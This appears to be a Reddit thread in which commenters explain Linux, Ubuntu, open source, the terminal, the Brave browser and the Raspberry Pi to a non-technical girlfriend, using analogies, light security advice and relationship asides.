 It's not vulnerable to hackers but much of Linux is meant for people who have technical expertise and are programmers.


**It's a bit like having a hobby for cars. Your Mac and iPhone is a Tesla while your bf is building and customising his own.**

It's all tinkering and it's very exciting (at least for me and maybe for him too)
Hey, I think people are nice and over-describing things to a noob from excitement that you've brought them a chance :D

Linux is a geeks operating system, where one can tinker anything in the system, and everything is allowed to you to view, modify and run, unlike mac or windows. Basically it's a yet another nerds 70s muscle car in dad's garage, only it being an operating system.
You got quite a few great answers already in the comments..

I just gotta say it's nice of you trying to understand your SO passion instead of the usual "it's just his things". :)
Check out [Linux journey](https://linuxjourney.com/), it will give you a very beginner friendly introduction to Linux and related topics.
A computer is divided in hardware and software the same way a human is divided in flesh, bones (hardware) and thoughts, thinking, immagination (software).

Then the software is divided into operating system (OS) and programs.

The operating system and programs are divided into closed source (aka proprietary) and open source (aka free as in freedom or libre)

Closed source software lets you just use it as it is, almost everything else is forbidden.

Open source software lets you see the source code, inspect, modify it as you wish and share it back with others.

Linux and Android operating system are open source, pretty much everything else is closed source.
I'm a very curious person, that's honestly how I came to be a computer user at a young age, that's how I came to be a Linux user as teenager. Part of why I know as much as I do about Linux is this curiosity has cost nothing but my time to pursue.

You've thrown out a lot of terms that you find new and strange. My experience has been that unless someone is curious or at the very least intrinsically motivated to understand, no explanation will stick.

Linux has many technical definitions, but I'm going to get into why I as a user, and I suspect your boyfriend value it. Linux gives users freedom. It lets you use the computer the way you want to, it empowers you through it's license rather than other operating systems constraining you with theirs, it respects your privacy rather than exploits it. Linux isn't just technically better, it's liberating.

The legal aspects alone aren't liberating, the system lets you pick and choose what components you use it with much like you can pick and choose your outfit for the purpose you have planned or the parts in your car. Combined with this Linux doesn't mind you knowing the secrets for how it runs, in fact the software and community encourage you to learn these "secrets" unlike Apple, Microsoft and others who make money off of secrecy and excluding the user.

Now if you want a technical definition Linux is usually used as a phrase in two ways. One refers specifically to the kernel, this is the software that controls your hardware for your software. It controls the screen, it knows what buttons you have pressed or when you click the mouse and so much more. Without the kernel software developers would have to write this behavior into every program. That would make it take longer to write software and make it far more flawed. The second definition refers to the kernel and some software that comes with it. This software involves things like basic tools, graphical environments, service managers, etc.

There are some videos that explain these things. One is called "The Code" it was a special done in Europe on Linux and it covers a good portion of the technical aspects at a very introductory level. https://www.youtube.com/watch?v=XMm0HsmOTFI You can probably find more on Youtube, but I think that is a good place to start for what you are looking for.
Goddamn. You are one hell of a keeper and this is so adorable.
How i summarized it for my girlfriend, who is now my wife. I like the car analogy best. It doesn't explain every detail, but it's good to conceptualize. 

High level:

 It's just another operating system like MacOS or Windows. But it's built using code that that is freely published and shareable. This is the Free and Open part--- open to anyone who wants to look at the code used to make it and available at $0. This encourages people to keep improving the software and progress. 

Terms:

"Ubuntu" is basically a finished car. It's the end product of a bundle of parts and pieces---engine, wheels, brakes, seats, etc. There are other names of finished cars that look and act a bit different--Manjaro, Mint, Debian, etc.--but they all have common pieces. One of the common pieces is Linux. Since all the parts of it are free and open, people can share the end product with others. 

"Linux"  is the engine that powers the car. The engine is called the kernel. It lives under the hood of the car and is responsible for making it go.

The Raspberry Pi is like a little golf cart. It's a tiny car, linux can be used as the engine. People generally use them to do little jobs or functions. There are whole communities dedicated to how-to projects with the Pi. 

A "terminal"  is just a way of using programs. But just text and keyboard, no mouse and no visuals. You can't double click an icon. Instead, you get a screen and blinking cursor and the system waits for you to type in a command.  A command is a specific word or a phrase the terminal can understand. And then it replies with whether those commands were successful or not.
>Frankly, I’m a little scared of computers

you really shouldn't .

>Terrified of getting hacked. Anything wonky looking on my computer scares me and sometimes Linux looks, well, creepy to me.

&#x200B;

oh , the irony... You say you use an iphone and a macbook. You are being "hacked" as we speak. Your personal data is at apple disposal and a lot of information about the use of the devices is collected and sent to apple everyday.

&#x200B;

Linux wont do any of that. Unless you tell it to. In a nutshell, a free linux OS is probably the most secure you have ever been.

>It’s definitely my lack of knowledge. I am a complete noob.

nobody is born with IT knowledge. You didn't know how to ride a bike before learning how to do so. 

&#x200B;

&#x200B;

>If you guys had a friend, or gf, who knew nothing about Linux or ANYTHING, how would you even begin to explain it?

i mean its a long discussion but its very possible i set up my GF with a raspberry with Archlinux on it and she LOVES it. She did some reading on her own though. You could literaly buy any of the "linux for dummies" and youd be fine.

But nobody can serve it up to you, you need to put effort in it , like most things .
> He’s got this new software that’s not google called “Brave.”

This gotta be bait
Just want to hop on here saying it is insanely nice of you to engage like this.
I'll just say that if you are terrified of getting hacked, you are better on learning how computers work instead of using device's developed so a baby can use them and you don't really know what's going on.

Not meaning to be rude. Good luck on your journey.
Tip 1. Don’t be the only woman in the world to date a programmer super into Linux.  

That is all.
Whenever you google something.. you can see adds showing up all over the page in chrome. Brave completely blocks such things. Windows and Mac is for people who wants  everything to happen by just clicking a button.. Linux is for those who want to create that button so that you people can sit back and enjoy :)
I am Linux user and my wife is just like you but I don't make her use Linux. She uses Macbook laptop and watch Netflix. Sometimes I show my terminal (Linux console without GUI) to my wife and she says like "oh cool screen" and that's it.
Seen lots of comments so far trying to explain Linux and the various other programs/terms you mentioned but I want to point something else out: It's fun!

It's **fun** to *truly* **take control** over your computer to make it do what you want. Maybe even make it work in ways the manufacturer never intended!

Then there's little computers like the Raspberry Pi that let you *take control* over *other* things like LED strips and motors and turn electrical things on an off. OMG my first RPi was a *blast*!! So cheap and yet so powerful and *neat*. I must've had a thousand evil chuckles that weekend.

Want to really blow your BF's mind? Get him a Arduino starter kit and tell him you want him to make a "light up heart". Hahahaha. muwahahahahaha!

He'll love it and he'll love *you* 😁👍♥️
Others have already explained things, but I wanted to say one thing: you are awesome!

I know how it is to not be able to share things I enjoy with my SO, and you try to get a basic understanding of linux to be able to talk to your SO.
He should know that you are a keeper!
I'm not sure anyone is giving you a low enough level.

Computers, including phones and lots of other things are just hardware. They are things you can hold and see.

In order for them to be useful, so that they do anything - like show something on a screen even - they need software.

Programs that allow you the user to interface with the hardware. 

What you do - touch the screen, press a key, move a mouse cursor - needs something to turn  that 'input' into something the computer understands.

To show you the results of that (e.g. moving the physical mouse draws an arrow on the screen moving) requires more software, another program to show you that 'output'.

Everything you do to it and everything you get from that computer is all that they do. Inputs and outputs. 

To do this, we use Operating Systems OS. Your PC might use Windows. Your Mac might use OSX, your iPhone IOS and your Samsung phone Android.  Note 'might'.

There are thousands of operating systems but these are the most popular.

When you use OSX or IOS - your Mac or your iPhone, you are using those operating systems to manipulate the hardware, the devices. The OS shows you the results.

(Recently, in the last 30 years or so, OS's have become all encompassing. They kind of do everything. They used to only do basic functions - the minimum really needed to get main tasks done, but now they come with lots of Apps - programs that sit 'on top' of the OS - that interface with the OS and not the hardware directly but this wasn't always the case).

Linux is an OS. It's free and there are many versions created by many organisations and individuals. It can run on many devices, all of the ones i listed before but most generally, from a normal person point of view, a PC. Certainly not exclusively but definitely commonly.

All the others are generally proprietary and commercial software. No one has the right to know exactly how they work. (Exception of Android).

Linux can be customised infinitely. If you want to know how it works in absolute detail you can. It can be completely manipulated by anyone. Anyone who knows what they are doing can use it to directly manipulate the hardware themselves. Remember that's what an OS does - it controls and manipulates the hardware.

A modern OS means you, the user, to have no need to understand any of that. You press your touchscreen and an app opens. Literally millions of things had to happen to make that happen. The OS takes care of a lot of that.

linux might look a bit sketchy but you've only seen highly commercial polished products in your life. What you see on the screen is not that important. What you see in the screen is really a very small part of what a computer does. Imagine disconnecting the monitor on a PC - the computer carries on regardless. It doesn't care -  that you aren't watching.

Linux and it's variants quite possibly run on more devices than anything else in the world. Some versions of Linux are very small and designed for small devices, toys, watches, engineering all sorts of things. Sometimes they don't have an interface (a screen) you can see. Most of the websites you visit including this one are probably based on Linux.

Think of it as almost a purists choice. A developer wants a tool that gives him the best chance of doing what he needs to do. Linux allows for that complete control.
 I think the best way to learn is to just click around and ask questions when you get confused. Terminal is  just the basic interface to communicate with your compuuter. It can be used as a file manger, you can use to write scripts to modify our computer, host websites and more! Just look up basic commands . Don't try to find whole tutorials but just ask
 You're a gem. Never change. You're lucky to have each other.
first off, you are a wonderful girlfriend.

now that that's out of the way, i had this same situation with a girl i dated a few years ago. she took a genuine interest, and didn't know much more than you about technology. she understood the reason i use linux is partly "because microsoft is evil" (her words but, i mean... she's right), but not much else. here's what we did.

every time she used her laptop at home, while i was free, i would sit next to her with mine and mirror what she did. she's a pretty basic user, and started off bordering on inept, but after a couple weeks, i did a dual-boot on her laptop. she was delighted with how much faster her aging gateway (yes, i said it, gateway) laptop was using mint, and soon could do everything she would on windows, on linux. i asked if she was comfortable with me removing windows, explaining if she ever truly needed it (for something that won't run on wine), i could easily reinstall it. she said yes, and i helped her get things really sleek. 

i ended up teaching her some basic terminal stuff. not a ton, but a few things. and she hasn't used windows since. while she got more familiar, she started to understand more about the basic philosophy of linux, which she appreciated (she's a smart girl, just had no reason to learn computers). it was one of the more rewarding experiences of my life :)
So here's my 2 cents on this as well.

You can download ubuntu as partition on your current computer, (get your boyfriend to set it up) and do a dual boot( when you boot your computer, you choose which partition is going to open and use that. I did it on a Windows machine for my wife and I to play around.)

Good news. You don't have to be a computer programmer, tech, computer scientist, or engineer (me, though the certs are woefully a decade or so out of date) to use Linux. You can download Ubuntu, and it operates almost exactly like Windows or a Mac. You have the desktop, you install programs, and you open them and use them. Just like your Mac. I have found that there are programs that replace almost every program that you use on your Mac and Windows machines to install on Ubuntu. Libre Office is compatible with Windows Office, opens all docs I've needed to open, saved them, open them in either program, and it works fine. No issues.

There are dozens of browsers out there to surf the internet. Brave, which your BF is using, is just one of them. They are pretty much 90%  the same. But ones like Brave, Vivaldi, Palemoon, etc., are a lot more private, and privacy protecting, than Edge, Chrome, Firefox, or Safari.

If you want to try one of the others, download it, open it, then sit your BF down and have him explain in plain English (or whatever your native tongue) what the settings do. They aren't complicated. It's just like many professions, words and phrases have developed that mean nothing to those not involved in computers or the industry. They have definitions. You just have to slow the happy excited computer geek in your life down a bit, and make them speak human again for a while.

The only warning about Linux, is it will not give you 20 different warnings that you're closing something and do you really want to do that? It functions on the understanding that you have chosen an action, it's doing what you tell it to do, like a good computer system should.

My dual boot is an old system that was replaced years ago. Doesn't matter what I do to it. All pertinent data, pictures, etc. that is needed or wanted has been backed up and moved a long time ago. One thing you can do is get an inexpensive 2nd hand computer, just load Linux of whatever flavour on it, and play around. That way you don't have to worry about anything too important, and it lets you get a feel for the OS and it's offerings.

&#x200B;

Edit- there are also places like this sub on reddit, where the community is more than happy to help out as much as they can. Like all places, there can be a few assholes, but for the most part, the Linux community is very chill place to be.
My fiance understands what Linux is, but she doesn't have the interest to learn more about it. That's fine: we don't need to be lockstep in our interests. 

>He tries to explain it to me. I don’t know what he’s saying!

So ask him to explain these things and break it down even further.

But I would advise this: if you don't have an interest in computers, don't force yourself into it. If, on the other hand, this stuff sparks a personal interest in you, go for it!

It's just a bad time to force yourself into something you're not that into, just to please your partner.
Take a stroll over to r/unixporn. That's one of my favorite subreddits.

Unix is like Linux's older but less cool brother. MacOS is based on Unix.
I am going to keep it simple.

&#x200B;

Linux is a popular free operating system (commonly called an OS, for short). Everyone has used or benefited from Linux either directly or indirectly.  For example, right now, as you read this, the website (Reddit) uses the Linux OS (operating system). You are currently benefiting from Linux, as most web sites are hosted (hosted means housed) on a server (server means a computer with a dedicated purpose).  So as you browse the internet, you are part of the Linux experience.  You can use Linux in many different ways and on many different devices, both directly and indirectly.  Your boyfriend has decided to do so directly on his personal computer.

&#x200B;

Linux does not have to be complicated or challenging to learn as many imagine it to be. Once upon a time, yes, Linux required you to know code and how to use the terminal (when you think terminal, imagine the MS-Dos tool you once could find in Windows or the black and white text older Windows editions showed when they first loaded).  Those days are mostly behind us as installing Linux can be as easy as installing Microsoft Windows. You boot up from the install media, pick your hard drive (where you are installing to), agree to the user agreement, pick a user name and password, and the system does all the rest.  Depending on who developed your copy of Linux, you can even install programs now as easy as clicking on a desktop icon or link. We have come to a point where you (mostly) do not need to know how it works to use it, but learning how it works can be beneficial (just as learning how Windows or Apple works can be helpful).

&#x200B;

You can use Linux for many different things.  From streaming movies, banking, checking e-mail, surfing the web, documentation, playing games, work, schooling, etc. Linux is as useful as you set it out to be.  The philosophy behind Linux is simple; if there is a will, there is away.  There is virtually no limit on what you can do with Linux.

&#x200B;

What is your favorite ice cream? Just as there are many ice cream flavors to choose from, the same is true for Linux. Linux comes in many different flavors. We call that choice of flavors "distros" (distributions). Ubuntu Linux, which your boyfriend uses, is one such flavor (distro). The distro (flavor) may change the taste (experience) and appearance, but ultimately it is still Linux, the same way strawberry ice cream and cookies and cream ice cream is still ice cream.

&#x200B;

And just as there are many Linux flavors for you to choose from, the same is true for web browsers. Your boyfriend has decided he likes Brave Browser, but he could have easily used Mozilla Firefox (my personal favorite), Google Chrome, Microsoft Edge Browser, etc. A web browser is a user interface that allows you to experience The Internet. As an Apple user, you may already be familiar with Apple Safari. That, too, is a web browser.

&#x200B;

Here is where my views may differ from many of the replies you will encounter. As Linux has grown in ease of use and adaptation, it can be targeted for exploitation, just as Microsoft Windows and Apple OS is targeted. The methods by which someone exploits and targets any OS (operating system) change and vary, but I believe it ignorant to assume you can or will always be immune. That said, for peace of mind, yes, obtaining an anti-virus for your computer is something I would still recommend, even on Linux. I would suggest ESET NOD32 (for Linux).

&#x200B;

That said, regardless of what operating system you use, be it Linux, Apple, or Windows, or what security measures you take and what device you use (computer, tablet, phone), the biggest threat is the error between user and keyboard (metaphorically speaking). That has been true since the first computer in the world was first switched on. And the more you learn (generally speaking), the better.

&#x200B;

In close, Linux is best (because it really is). -- YES, my name checks out. ;-)
I have the feeling I read this same post last year somehow. Maybe a glitch in The Matrix.
Linux is basically like windows or ios, but without millions of dollars of user experience work invested. It was made by programmers for programmers, so they didn't see the need.

It can be an OK platform for hosting small servers (tell him to check out pihole for his raspberry pi). I use it for that and a print server for my 3d printers. I started trying to host a plex media server in Linux too, but ran into a lot of issues, and windows ended up being a perfectly fine solution for that. 

It used to have the benefit of being free too, but windows 10 is now essentially free, so it lost that benefit. Before win 10 my wife and I used it when I was too cheap to buy a new license for our living room computer/TV (we use wireless mouse and keyboard from couch to watch Netflix and web browse mostly). Besides looking a little different, my wife was able to use it just as well- the desktop experience has come a long way since the early days.

For a non technical person though, it's not going to have a whole lot of use of interest to you. The average person like yourself doesn't use it simply because it's just not the best solution for most problems.

Just listen when he's explaining the projects he's working on, maybe tell him how smart he is for figuring out all out, and humor him a little if he has something for you to try, and you'll be good to go from relationship perspective. If he gets really into it he could learn skills for a better job in the future, so it's certainly not wasted time.
Have you seen the movie "The Matrix"? When you are inside the matrix, you can't tell what is really going on, but when you are outside, you can look at the raw "computer code" and see what's going on.  This is a good analogy for computers, because it's how computers work.

Most people make the mistake of thinking they "understand" their computer because they understand what is on the screen. But the screen is only a minuscule fraction of what is going on, and most things aren't/can't be represented on the screen. Even when you have a blank screen, there are 100's of different things running around the computer, doing "work".  And there are many different levels (just like you have thoughts, you have chemical reactions in your brain, you have hormones in your blood, you have nerves, etc.) Early computers were simple enough that you could "[see](http://visual6502.org/JSSim/index.html)" their workings (hit the play button). But today's computers are millions of times more complex.

When you look under the hood of computers, it looks "scary" because the media has associated "green text" with hacking. But it's actually really just a part of programming. (Just like in the future, people will ask "Did you really drive around with tanks of volatile, flammable liquids?". "Yes, it was just part of driving!".)

&#x200B;

>He tries to explain it to me. I don’t know what he’s saying!

Sounds like he's bad at explaining it. Often times, beginners (him) can't explain things well because you have to understand it more to explain it. You should keep asking questions in different ways. Our computers are built on 1000's of years of technology that feels like magic: How does the silicon in sand turn into Facebook? 

Lots of kids use the Raspberry PI, so you might be able to find some tutorials/videos online. Watch them together, and you can ask your BF the questions you have. (Gift idea for your BF: the BBC Micro:Bit is a simple/cheap computer aimed at people learning electronics and programming. )

There is also a documentary called [Revolution OS](https://topdocumentaryfilms.com/revolution-os/) that might help explain the origins of Linux.
If you are using macOS, you are already using a variant of a close cousin of Linux called BSD.

macOS has a terminal which looks like Linux and can be used similarly.

I hope this fact helps you realize you're actually not that far away from Linux already.
I'm three long term relationships into life, one cheated, one died, current one is going great. My point being that I think I understand relationships pretty well by now and I make no attempt to explain any of this to my partner. I know she's not interested and there's no reason she should be. Its not a part of why I love her, I love who she is and I don't expect her to change for me.

It's very sweet that you want to understand this stuff but you don't really have to. If you feel the need to understand his happiness then ask him to explain it in those terms. What part of it makes him happy, what's his next target, how close is he to getting there? Think of it like watching a football match sitting next to somebody who really supports one of the teams playing. You can share their happiness or sadness without knowing all the players names.
I just have to say I like the you are trying to understand your bf's hobby :)

I'm very much into computers as well and my gf also does some stuff with them, but she isn't really into them and is happy when she is done with them, haha 😅
[deleted]
Can I fling in another part of this which is outside the spectrum of computers?

One of the things that are the coolest with open source is the community aspect. I'm a massive nerd, but my computer skills are slim at best, but I have some skills needed within the Open Source community and was invited to a sprint years ago. From that grow this fascination with the community, the tech and the to be honest, from a tech-moron like me's point of view, basically magic things done. Often ignored in press and culture, often not well paid, but often incredibly critical. (at one conferance I met a dude who was critical in creating the connection system to satellites from phones... man worked as a teacher still)

The point is that the community, the organisations, the meetings and sprints are brilliant things. Sure its technical but often its tech ment to be implemented in a useful way for as many as possible. It means it includes so many more than just the technically skilled.

Open source can only exist with those communities and considering how relevant open source is to... well the entire world in reality, daily, constantly... those communities of creatives (tech and non-tech) are these strange, wonderful things and I urge you and anyone (specifically someone like you who have the courage to just ask, that takes a lot of strength so awesome work <3) to join in. See where you can contribute or would like to contribute and find a path to do so.
I'm in a similar situation as you, except I'm the guy in it. My wife knows how to use technology, but isn't great at it. Whereas my entire life I just build whatever I want. PCs, custom CNC machines, whatever - opposite ends of the spectrum. I got into linux kind of incidentally from my old computer repair days, and use it more as "another tool in my tool belt" than as a full time thing.

Your MacBook runs on OSX operating system, your iPhone runs on iOS. Most PCs run on Windows. Basically every phone that's not an iPhone, run on Android (a Linux-based OS). Ever used a GPS? That's Linux. Your smart TV? That's Linux. Think of the Operating System as the core of the computer that you're using. It can be big and expansive, it can be pretty basic, it mostly just dictates what you're allowed to build up around it's core using other software.

Where Windows or OSX or iOS were all built to act in one specific way, on one kind of thing, Linux was designed to be the most-stripped down version of an operating system that people could build whatever they wanted on top of it.

Think of Apple's operating system like a Tesla Roadster - it's all tightly integrated, works well, but you have very little control over how things look or feel. If you like it, it works great for you. If you don't like it, too bad, that's the only way they sell it, and they don't like you modifying it.

Windows would be like buying a Toyota. You want a pickup truck? Cool. You want a sports car? We've got those too. You want to add a bunch of aftermarket parts to change how individual aspects of the car works? That's totally fine. They're not as nice as a Tesla overall, but the variations add a lot of value in a lot of people's eyes, but if you just want to use it as is, that's totally fine too.

Linux is like buying a frame. You get nothing. But now you get to choose what wheels go onto it, what shapes the fenders are, how many pedals are on your floorboard, the engine, the transmission, everything. Everything is yours to control and construct yourself. You can build anything from the tiniest little car to a monster truck. Every nut and bolt is yours to decide on, and all of the parts are free, except for the labor to build the car yourself. Or you can get that frame, and use somebody else's blueprint for what you want to build with something like Linux Mint or Ubuntu, or thousands of other options for a complete operating system built around the Linux-frame.

Linux is definitely not for everyone, but the level of control and customization of it is unparalleled. And since the core-thing of Linux is SO tiny, it is essentially infinitely flexible. Hence why basically every smart device you've used, is probably Linux based. It can look like anything, run on anything, etc.

In my room right now, I have 3 Linux "computers" for driving 3D printers and other smart devices for me, an Android cell phone (Linux-based), one Windows PC that I do most of my work on, a Linux server, 2 windows laptops (one for work and one for gaming), and a MacBook. Each of those things is used for wildly different purposes, with wildly different requirements, and some of the things I wanted to do, I could ONLY do with Linux due to the ability to modify literally everything about it. 

All of that being said, I'm not a Linux nerd - I can fumble my way through it, I've made some really cool things with it, but it's not going to be my daily driver because of some of the software that I use on a daily basis.
install funtoo, go to [funtoo.org](https://funtoo.org) and learn bash by example.  funtoos boot camp will make you good at computers lol  like NSA, NASDAQ, GOOGLE, FACEBOOK engineer grade linux user.
Get a different boy while it's still time.
is this boyfriend legit being a leet linux bro with ubuntu?

if he want's to be a bit more leet he should get himself like at least debian, arch if he wants to be the average linux kernel enjoyer, but if he wants to be the true man of linux he should get gentoo.
At a ELI5 level, Linux is an operating system or OS. You can compare it, in the computer world to Microsoft Windows or Apple OS X, or in the mobile phone world to Apple iOS or Android. It is the software that you use to interface with other applications and devices. 

Linux is an open source operating system, this means any computer programmer can download the code of Linux and compile their own operating system. Ubuntu is a version of Linux compiled by Canonical. Canonical provides compiled versions of applications and updates as a service to users of Ubuntu. 

A Raspberry Pi is a type of computer called a single board computer (or SBC). All this means is all of the hardware is on one motherboard, and generally a small form factor (or footprint).
I should have said this earlier, u/lovensic, as much as you may feel you have some responsibility to understand him, it's also his responsibility to understand you and act accordingly *correctly*. It was part of his responsibility to reassure you, and explain to you understandably what you should care about (if anything). This'll be a dialogue, and it may take a while, even though some of the answers, IMHO, are quite short and simple.
You just having this desire is beautiful and wonderful, understanding Linux starts with needing a computer to do something and then learning how to do it, without the goal it's much harder to learn
macOS is also unix-like OS, actually more unix than linux, it is certified by the open group. It has terminal too etc. Although Apple doesnt want you to mess with how the system works, while linux encourages tinkering.

Lots of opensource software is available on macOS with homebrew. 

Try asking him to explain stuff he is doing, he should be excited even if you dont understand some stuff. But he probably should realise not everyone wants to tinker with computers deep down to the OS level - ask him how this stuff can be usefut to you.

Also dont be afraid that much about breaking stuff - he can help you fix it.
Edit: while I was typing others posted more relevant responses, leaving up for posterity/completeness.

Lots of stuff omitted and/or very intentionally innacurate to make it easier to explain, but should clear things up.

* Quick intro to how computers work: You may know this already, but basically, any program (firefox/chrome/internet explorer, microsoft word, any video game) on your computer is basically a list of numbers. However, looking at numbers all day would drive anyone crazy, so people invented 'programming languages'. Essentially, you write down, in something that looks kind of like english, a sort of recipe what you want your computer to do. Then, an app on your computer looks at your recipe, and turns it into numbers! This way, you can give your computer instructions without having to deal with these giant lists of numbers. The app that turns your text into numbers is called a 'compiler', the text itself is called 'source code', and the resulting list of numbers is called a 'binary' (binary is just a type of number). There are a few ways of writing these instructions, and the different ways of writing them are called 'programming languages'. And just in case: A program is the same thing as an app, the two are interchangeable.

* For a lot of apps, when you download them, you get only the binary (a list of numbers telling your computer what to do). 'Open source' just means that you also have access to the source code (the recipe that we turned into our list of numbers)! This sounds minor, but is pretty important! Reading the list of numbers is sort of like trying to bake a cake by following the *exact movements* somebody else did: 'I use the muscles in my shoulder to move my hand. Close my hand around the fork. Move my hand with my shoulder muscles, rotate my wrist to put the fork in the mixing bowl.' And so on and so on, sometimes even more painfully precise! Compare this to reading 'stir the batter for 10 minutes'; much more understandable and less confusing! A lot of companies hide their source code for exactly this reason; they don't want to give away their secret sauce. 

* Ok, so 'source code' is kind of like a recipe telling your computer how to do something ('if you see the batter browning, pull it out of the oven' is sort of similar to 'if they press the f key on the keyboard, display a rectangle'). The problem is, different keyboards might 'make' different numbers depending on what key you press. Different printers might expect different numbers expressing how to print your picture on the page. Going back to the 'cooking while copying someone's hand motions' metaphor, some computers might look like a restaurant kitchen, and others might look like someone's home kitchen! To deal with this, we have 'operating systems'. They make it so that no matter what keyboard you're using, no matter how big your screen is, all the program needs to do is to say: 'grab that fork' (or more realistically, 'print out this image'). So an operating system standardizes how you draw, how you receive some sort of input from the user, that sort of thing. You can think of it as yet another layer - once your source code gets to turned into numbers, the operating system then takes those numbers and turns them into some other numbers, that finally your computer can understand. It also happens to usually be responsible for making your computer look a certain way, but that's just incidental, it's not necessary.

* Linux is an operating system that is open source, and is also written almost entirely by volunteers! Why do they do it? Cause they're cool people who enjoy it, I can't really think of another reason. A lot of open source software is developed by volunteers, for little-to-no-pay, and without it, a lot of modern things that we take for granted would break. It's super sweet, and all run by donations and stuff.

* 'Free and open' is just short for 'free and open source', the latter of which we've discussed. The first part ('free') just means that if you want to make some changes to the source code and make your own program (maybe even sell it!), then that is allowed. You're allowed to change up the recipe and sell it - seems fair to me! For a lot of people, programs that are not free and open source are almost immoral or unethical, because you should have the right to understand what is running on your computer, and the right to modify it at your leisure.

* Terminal: It's kind of like a file browser (think of the app you use to copy and paste folders and files), but you type in text instead of clicking and dragging. It's really not that scary; 'ls' lists all of the folders where you are located, 'cp' copies, 'mv' moves. It can do a ton of other useful things (in fact it can do a *huge* amount of things). It even comes with its own mini-programming language! (that gets turned into numbers, that get turned into more numbers, that your computer does stuff with!)

* Ubuntu: Remember how I said that the fact that operating systems look different is incidental? Well, the 'core' of Linux makes it REALLY hard to draw a window or do anything, really! All you can do is type text and see text! Ubuntu is Linux, with an additional program that lets your use your mouse, use a browser, that sort of thing. If Linux is the engine of a car, then Ubuntu is everything else :)

* Brave: Just a browser (like chrome or firefox), it might is a bit better about not selling your information. It is free and open source, but so is firefox.

* Raspberry pi is just a really low powered computer. It's so low power that many operating systems can't run on it, but Linux can! It's usually used for hobby projects, like christmas lights displaying funky lighting patterns.

OK that's a lot, but I think I answered all the questions! Let me know if you have more, I love this stuff :)

Nota bene: It is *very* unlikely your BF hacks people just because he uses linux. Pretty much anyone with a job that involves some programming (physicists, applied mathematicians, software engineers) will use, or be familiar with, Linux. It's very very common, not to be concerned about!
/u/lovensic, I tried to vulgarise. Could simplify more if required.

It sounds like you have a reasonably healthy relationship at the very least. Good.

Windows let's you use a physical computer. Linux does too. Some things are different. Some things are the same. Linux can do way more things that he and I care about, and better. Also, you don't just click, drag, whatever on things in programs you already have. Now he'll start ordering the computer around in text instead of clicks and whatever.

Also, if he really can't explain to you in normalperson-meaningful terms what things are, why, how they're different, why you should care (most things, probably not—details), **that's a skill he needs to work on**. So long as you're not completely intellectually incapable (do **not** assume by default), the burden of explaining and leading properly is his… if you care.

The Pi is a just **cheap** and different small computer with all the parts exposed, and a few little metal pins you don't have on your laptop or desktop, so that he can attach sensors, actuators (e.g., motors), etc. You run Linux on it, not Windows. There's a market for making things that connect easily to it, or you like an adult somehow adapt other things to it instead of expecting them to be handed to you perfectly ready how you wanted them. It's just for fun little projects in his case, likely. So long as he doesn't do anything stupid security-wise with it, per below.

‘Wonky-looking’, whatever has zero to do with getting hacked. **It's text on a screen to tell him the most boring data, fan rate, temperature of the machine's parts, how much work it's doing, or just text in some file he's working on.** It's a bit direct to say this, but you just need to get over your _fear of the unknown_. So it looks weird? It works differently? So what? You shouldn't even care if not using it or it doesn't otherwise affect you.

* Your “lack of knowledge” is secondary. I'm not going to judge your problem solving, discourse, understanding abilities whatever remotely. If you think they need to be worked on, **work on them for your own sake, and not his**.

Getting hacked has zero to do also with how it looks in the movies, which are usually absolutely f—ng stupid, pardon me, and don't help the world's current educational problems. It's boring, non-visual, and not done with weird _abracadabra_ of the movies. Usually either the user let a machine be remotely accessible from the Internet **while it runs some program designed for an admin to use it remotely** but used a weak password or something similarly dumb, credentials got stolen, or there's a bug in some program (much rarer, but a few high profile ones a few years ago) such that an attacker sends some nonsensical overwhelming message and somehow the code starts running the code the attacker sent… to do whatever with your computer.

* You probably won't notice if you got “hacked” except for some funky ransomware on Windows that'll pop up a message, or your computer fans going haywire for hours when you're doing nothing with the computer (cryptominers), or maybe, if your antivirus (hahahaha) software gets lucky and tells you it spotted something (and is worse at explaining things than him).

* Speaking of, ignore those emails where people tell you they've “hacked” you. They're bluffing, no matter how credible _you_ think they sound. Don't even tell them to eff themselves.

He's not entirely right about Brave. It's just a different kind of fishy than Chrome, and I trust it less (and also some of the right-wingers that founded its company). I'm not sure how good his research or critical thinking skills are, or his emotional investment. Just be careful around that topic.

You may question his sense of taste visually (how the programs he uses look and work). Sometimes you'll be right. Sometimes you'll be wrong. Who cares? Just don't let him change your computer's programs suddenly when you're trying to get things done on a deadline. Computers aren't your thing and you need training or obviousness. Draw reasonable boundaries and get him to _work with you_ if he tries to ‘improve’ your computer. But you're in a relationship already, so we should trust that you already know how to handle yourself?

There's more market, incentive, etc. to hack Windows machines, not his newfound toy… so long as he doesn't do anything silly. Tell him exactly this: “keep the books on a machine that has SSH, VNC, RDP, etc. servers or whatever _turned off_ and not exposed to the public Internet; no accessing the bank account or stores from that machine” and he'll have reduced the biggest risk. Unless he's a qualified software engineer, sysadmin, or security-trained web developer, safety/money/privacy-critical things should not be connected to any computer connected to the Internet **anyway**, Linux or not. Linux doesn't prevent you from doing silly things (nor does Windows), just like a chef's knife is supposed to be handled with due care. Windows is just a bit more like some unreliable condescending overpriced knife you're not sure if it'll chip and leave something sharp in your food to swallow but likes to tell you about its “safety” features. Linux is the razor sharp knife that does exactly what it's supposed to do and if you don't act like a professional, that's your fault, a different kind of condescending chef's knife.

Don't ask me for **experienced** relationship advice. Just do your usual adult thing, make sure that he still spends time with you or **however you define a healthy relationship**, and if you can and want to draw boundaries of interest (the whole thing or just allow some topics), power to you?
Make sure he knows that the Brave browser is spying on him and tracking and selling that information.
He's a geek just love him ...


PS and sex him up
I dont bother getting into the details with people regarding my OS, people dont know, and dont want to know, they generally just dont give a shit.

&#x200B;

its cute that you want to better understand it, but honeslty sounds like you're at a place where , unless you either a) need to know for like work or some shit, or b) are genuinely interested.. I would not bother. When he starts getting into it and talking about stuff, just nod your head and say "thats great!" or whatever.

&#x200B;

its basically a lot of reading, studding, trial & error. Unless you're doing it, you probably wont really get it.
What's gonna happen when your boyfriend sees this thread 😜
P.S No offense
So linux is open source meaning that you can view the source code without permission from the owner unlike windows and mac OS in which only developer s employed by microsoft and apple can view it. Actually linux is based off of another operating system called Unix but since linux is open source you can take the code and make other operating systems like ubuntu and fedora. Also everything based off linux is still open source. The terminal is the base of your system where you run commands and you install software. (But using the terminal is not required to use linux) The raspberry pi is a small computer that is mostly used to run linux in and is sold for as low as 30 dollars for the base model.
Ubuntu is one possible variation of Linux. Anybody with the will and ability can make their own variant of Linux. Each one is basically its own customized "flavor".

"Free and Open" means that no restrictions exist on Linux's use and all information on it's inner workings are available to the public. You don't need anyone's permission to modify it to your particular needs.

